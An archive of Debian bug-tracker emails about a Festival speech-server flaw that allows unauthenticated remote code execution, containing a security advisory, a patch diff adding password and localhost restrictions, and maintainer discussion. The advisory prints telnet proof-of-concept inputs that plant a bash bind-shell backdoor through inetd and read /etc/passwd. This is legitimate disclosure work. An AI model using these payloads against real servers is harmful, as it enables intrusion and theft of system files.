Bug#491114: Work around confirmation
> /etc/udev/rules.d/65_dmsetup.rules needs to be changed so that the three first lines all have GOTO="device_mapper_end". Confirmed that this resolves the problem. Cheers, Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Saturday 01 March 2008 14:44:01 Nico Golde wrote: > Hi Tim, > > * Tim Brown <[EMAIL PROTECTED]> [2008-03-01 15:28]: > > On Tuesday 19 February 2008 20:12:29 Nico Golde wrote: > > > > It > > > > probably also needs rewording since SuSE confirmed it affected them > > > > and I think we agree it affects Debian. How do we go about doing > > > > that - is that something for you guys or do I need to get involved? > > > > > > I see your point, I will contact mitre to update the CVE id > > > or to assign a new one. > > > > No news from MITRE? At least their CVE entry doesn't appear to be > > updated. > > Huh? "which allows local and remote attackers to execute > arbitrary commands" > Cheers > Nico I saw that, but assumed it would reference Debian in some manner. After all Debian distributions (and derivatives including Ubuntu hardy) are/were exploitable. Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tuesday 19 February 2008 20:12:29 Nico Golde wrote: > > It > > probably also needs rewording since SuSE confirmed it affected them and I > > think we agree it affects Debian. How do we go about doing that - is > > that something for you guys or do I need to get involved? > > I see your point, I will contact mitre to update the CVE id > or to assign a new one. No news from MITRE? At least their CVE entry doesn't appear to be updated. > I guess they will happily release a DSA if someone comes up > and provides a fixed stable package that just works. I've attached a patch that I think resolves this issue on stable - no warranties. Just wanted to make this final email as I'm intending to release my advisory shortly subject to any updates here. Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> diff -rN festival-1.4.3/debian/changelog festival-1.4.3-new/debian/changelog 0a1,18 > festival (1.4.3-17.3) unstable; urgency=high > > * Fix root security hole. Thanks to Tim Brown. > + debian/festival.init: Read festival.scm upon start. > (Closes: #466146) > * debian/festival.scm: > + Add sane default values for server. The festival > init script now uses these values while starting the > server. > * debian/README.Debian: > + Document some changes on daemon mode. > * debian/templates, debian/config, debian/festival.postinst: > + Ask for server password during install. > * debian/lintian-override: > + Permission of /etc/festival.scm should be 0600. > > -- Tim Brown <[EMAIL PROTECTED]> Sat, 01 Mar 2008 12:40:33 + > diff -rN festival-1.4.3/debian/config festival-1.4.3-new/debian/config 0a1,20 > #!/bin/sh -e > > # Source debconf library. > . /usr/share/debconf/confmodule > > # grab selected config values from the config file and store them > # in debconf's database > > # first grab existing value (keep config file's existing value) > CONFIG_FILE=/etc/festival.scm > > # to help security, let password be entered afresh each time > # (and don't display the value left in the debconf database of > # "password written to config file") > db_set festival/server_passwd "" > > db_input critical festival/server_passwd || true > > db_go || true > db_stop || true diff -rN festival-1.4.3/debian/festival.init festival-1.4.3-new/debian/festival.init 27c27 < --exec $DAEMON -- --server --- > --exec $DAEMON -- --server -b /etc/festival.scm 39c39 < --exec $DAEMON -- --server --- > --exec $DAEMON -- --server -b /etc/festival.scm diff -rN festival-1.4.3/debian/festival.postinst festival-1.4.3-new/debian/festival.postinst 0a1,50 > #!/bin/sh > > set -e > > . /usr/share/debconf/confmodule > > # write selected values into config file > CONFIG_FILE=/etc/festival.scm > > PASSWD_ENTRY=server_passwd > > PASSWD=your_festival_passwd > db_get festival/server_passwd > PASSWD="$RET" > # insert the entry, if it is missing (which it ought not to be) > grep -Eq "^[[:blank:]]*\(set![[:blank:]][[:blank:]]*$PASSWD_ENTRY[[:blank:]]" $CONFIG_FILE || \ > echo "(set! $PASSWD_ENTRY \"$PASSWD\")" >> $CONFIG_FILE > > # only process the password if it is not empty > if [ "$PASSWD" ]; then > # copy config file here in order to preserve permissions when actually > # building the tmp file in the sed step > cp -a -f $CONFIG_FILE $CONFIG_FILE.tmp > > # escape sed special characters > #echo $PASSWD | sed -n 's|[\|\$\&\.\*\%\^\+\?]|\\&|g' > PASSWD=$(echo $PASSWD | sed 's|[\[\(\)\|\$\&\.\*\%\^\+\?\/]|\\&|g') > sed -e "s/(set.[[:blank:]]\+$PASSWD_ENTRY.*)/(set! $PASSWD_ENTRY \"$PASSWD\")/" \ > < $CONFIG_FILE > $CONFIG_FILE.tmp > > mv -f $CONFIG_FILE.tmp $CONFIG_FILE > # remove the password from the debconf database > db_set festival/server_passwd "password written to config file" > > fi > > # extra safety check: ensure passwords in config file cannot be read by anyone > chown nobody /etc/festival.scm > chmod og-r $CONFIG_FILE > > # Supporta log file > mkdir -p /var/log/festival > touch /var/log/festival/festival.log > chown nobody:audio /var/log/festival/festival.log > > # must indicate we are done with debconf, or the script will hang when the > # server is started below (DEBHELPER section, via dh_installinit). > db_stop > > #DEBHELPER# diff -rN festival-1.4.3/debian/festival.postrm festival-1.4.3-new/debian/festival.postrm 4a5,9 > if [ "$1" = "purge" ];then > rm -rf /var/log/
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tuesday 19 February 2008 19:20:23 Nico Golde wrote: > * Tim Brown <[EMAIL PROTECTED]> [2008-02-19 20:08]: > > I've just notice that the security tracker > > http://security-tracker.debian.net/tracker/status/release/unstable has > > been updated for festival. However it is wrong. This bug *is* remotely > > exploitable (due to the afore mentioned lack of ACLs). > > Sure it is :) The remote exploitability status isn't set > manually by us. This is extracted automatically from the NVD > text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which > doesn't mention the word 'remote'. I think that's the > reason. Patches welcome :) Okay, so the CVE entry is wrong (which probably explains why it wasn't correctly resolved by the maintainers when it was first looked at). It probably also needs rewording since SuSE confirmed it affected them and I think we agree it affects Debian. How do we go about doing that - is that something for you guys or do I need to get involved? Also, since we have a working patch for the issue on mentors what happens now. Can it go through as NMU? What about the backport to stable and testing? Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Nico, I've just notice that the security tracker http://security-tracker.debian.net/tracker/status/release/unstable has been updated for festival. However it is wrong. This bug *is* remotely exploitable (due to the afore mentioned lack of ACLs). Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tue, 19 Feb 2008, Kumar Appaiah wrote: On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote: Hi Tim, this is somehow strange, this CVE id was already fixed in 1.4.3-21 referring to the security tracker (see bug #435445 for reference). Did this fix got lost somewhere in the package history? It appears that the troublesome issue of running festival as a less privileged user was handled in the last upload. However, what was not handled was the restriction of accesss to localhost by default, and the necessity to introduce a password for this purpose. The last upload, which Tim has checked a few times, introduces this feature, and thus, makes the security aspect a bit more complete. Hope this is fine. Thanks for the follow up. This is my impression too. Gentoo introduced localhost restrictions in their patch for the original issue, in addition to changing the init process of the server so that it run under its own privileges rather than root- they didn't add authentication though. The Debian patch only changed the init process of the server, which while preventing a full root compromise, did not prevent remote unauthenticated access. Looking at the previous bug history there was some discussion about disabling the system command too, but IMO this does little to fix the underlying problem of an unauthenticated scheme interpreter bound to a remote port with no ACLs or authentication. Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Monday 18 February 2008 07:42:06 Kumar Appaiah wrote: > Dear Tim, > > Many thanks for the constant support. The package should now be all > right with this change, available at the same location. Not a problem - it seems to build cleanly now with no problems. I guess it can be pushed to unstable and backported to stable security. Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Monday 18 February 2008 01:40:00 Kumar Appaiah wrote: > On Sun, Feb 17, 2008 at 05:32:44PM +0000, Tim Brown wrote: > > I've just built it here. It is lintian clean and the patch provides the > > required security fix. However 2 small points, 1) The logging doesn't > > work as /var/log/festival isn't created (and owned by festival,audio) 2) > > Passwords are displayed by debconf rather than hiding them with *'s. I'm > > only a fellow maintainer, but I'm sure your mentor can provide > > appropriate feedback on these issues. > > First of all, many thanks for pointing out both these issues. I have > solved both, and the fixed version is here: > > dget -x > http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6. >dsc Looks good apart from Lintian reporting: N: N: chown user.group is called in one of the maintainer scripts. The N: correct syntax is chown user:group. Using "." as a separator is still N: supported by the GNU tools, but it will fail as soon as a system uses N: the "." in user or group names. N: Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote: > Please note that I now use debconf to ask for the password to be > entered. I have tested that the system works fine, but as this is my > first debconf experience, a quick review would be appreciated, > followed by upload, as this is a security bug. Another thought, the fix will require backporting to stable so that it can go into the security updates. Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote: > dget -x > http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6. >dsc > > Please note that I now use debconf to ask for the password to be > entered. I have tested that the system works fine, but as this is my > first debconf experience, a quick review would be appreciated, > followed by upload, as this is a security bug. Kumar, I've just built it here. It is lintian clean and the patch provides the required security fix. However 2 small points, 1) The logging doesn't work as /var/log/festival isn't created (and owned by festival,audio) 2) Passwords are displayed by debconf rather than hiding them with *'s. I'm only a fellow maintainer, but I'm sure your mentor can provide appropriate feedback on these issues. Cheers, Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 05:13:21 Kumar Appaiah wrote: > tags 466146 pending > thanks > > Hi! > > A package is ready for upload at mentors. Thanks for the report. If, > after consulting my sponsor and some security people, I find that it > is OK, it shall be uploaded. Kumar, Can I suggest that a password is set (perhaps take a look at the Debian MySQL server package which does something similar for the debian-sys-maint in the /etc/mysql/debian.cnf file). Limiting access to local hosts is an improvement, but as noted it does not guard against local privilege escalation attacks. Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Package: festival Version: 1.96~beta-5 Severity: critical Tags: security Justification: root security hole Nth Dimension Security Advisory (NDSA20080215) Date: 15th February 2008 Author: Tim Brown <mailto:[EMAIL PROTECTED]> URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/> Product: Festival 1.96:beta July 2004 <http://www.cstr.ed.ac.uk/projects/festival.html> Vendor: Centre for Speech Technology Research, University of Edinburgh <http://www.cstr.ed.ac.uk/> Risk: Medium Summary The Festival server is vulnerable to unauthenticated remote code execution. Further research indicates that this vulnerability has already been reported as a local privilege escalation against both the Gentoo and SuSE GNU/Linux distributions. The remote form of this vulnerability was identified in 1.96~beta-5 as distributed in Debian unstable. Technical Details The Festival server which can be started using festival --server is vulnerable to unauthenticated remote command execution due to the inclusion of a scheme interpreter. It is possible to make use of standard scheme functions in order to execute further code, like so: $ telnet 10.0.0.1 1314 Trying 10.0.0.1... Connected to 10.0.0.1. (system "echo ' stream tcp nowait festival /bin/bash /bin/bash -i' > /tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf") Connection closed by foreign host. Whilst this is the most trivial way that the vulnerability can be exploited the inclusion of a scheme interpreter available without authentication allows for other vectors of attack. Scheme functions such as SayText and tts (which reads a file on the vulnerable system) pose particular interest, for example: $ telnet 10.0.0.1 1314 Trying 10.0.0.1... Connected to 10.0.0.1. (tts "/etc/passwd" nil) Whilst it is acknowledged that the inclusion of the scheme interpreter in this manner is entirely intentional, the default unsecure state of the server could be exploited particularly where the user is unaware of the servers existance. Solutions In order to completely protect against the vulnerability (in the short term), Nth Dimension recommend turning off the server or filtering connections to the affected port using a host based firewall. The server itself can be secured by applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477. This includes applying a default configuration which limits access to localhost and setting an optional password which prevents unauthenticated access. -- System Information: Debian Release: lenny/sid APT prefers oldstable APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages festival depends on: ii adduser 3.105add and remove users and groups ii libaudiofile0 0.2.6-7 Open-source version of SGI's audio ii libc6 2.7-8GNU C Library: Shared libraries ii libesd0 0.2.36-3 Enlightened Sound Daemon - Shared ii libestools1.2 1:1.2.96~beta-2 Edinburgh Speech Tools Library ii libgcc1 1:4.3-20080202-1 GCC support library ii libncurses5 5.6+20080203-1 Shared libraries for terminal hand ii libstdc++6 4.3-20080202-1 The GNU Standard C++ Library v3 ii lsb-base3.1-24 Linux Standard Base 3.1 init scrip ii sgml-base 1.26 SGML infrastructure and SGML catal ii sysv-rc 2.86.ds1-53 System-V-like runlevel change mech Versions of packages festival recommends: ii festvox-kallpc16k [festival-v 1.4.0-5American English male speaker for -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
